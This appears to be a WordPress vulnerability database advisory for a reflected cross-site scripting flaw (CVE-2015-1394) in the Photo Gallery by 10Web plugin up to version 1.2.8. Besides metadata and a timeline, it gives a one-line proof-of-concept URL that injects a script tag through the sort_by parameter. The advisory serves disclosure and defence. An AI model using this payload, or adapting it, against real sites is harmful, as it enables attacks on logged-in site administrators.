logoWordPressPluginsThemesAPISubmitContact
search-icon
logo
search-icon
WordPressPluginsThemesAPISubmitContactSecurity Scanner
Register

Photo Gallery <= 1.2.8 - Multiple Authenticated Reflected XSS

Description

The Photo Gallery by 10Web – Mobile-Friendly Image Gallery WordPress plugin was affected by a Multiple Authenticated Reflected XSS security vulnerability.

Proof of Concept

/wp-admin/admin-ajax.php?action=addImages&width=700&height=550&extensions=jpg,jpeg,png,gif&callback=bwg_add_preview_image&sort_by=name";><script>alert(1)<%2fscript>

Affects Plugins

photo-gallery

Fixed in version 1.2.11

References

CVE

CVE-2015-1394

URL

https://seclists.org/bugtraq/2015/Jan/140

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CWE-79

Miscellaneous

Verified

No

WPVDB ID

f58ee705-afea-467e-8284-158e0638bb49

Timeline

Publicly Published

2015-01-28 (about 6 years ago)

Added

2020-02-08 (about 1 years ago)

Last Updated

2020-09-22 (about 1 years ago)

Our Other Services

WPScan WordPress Security Plugin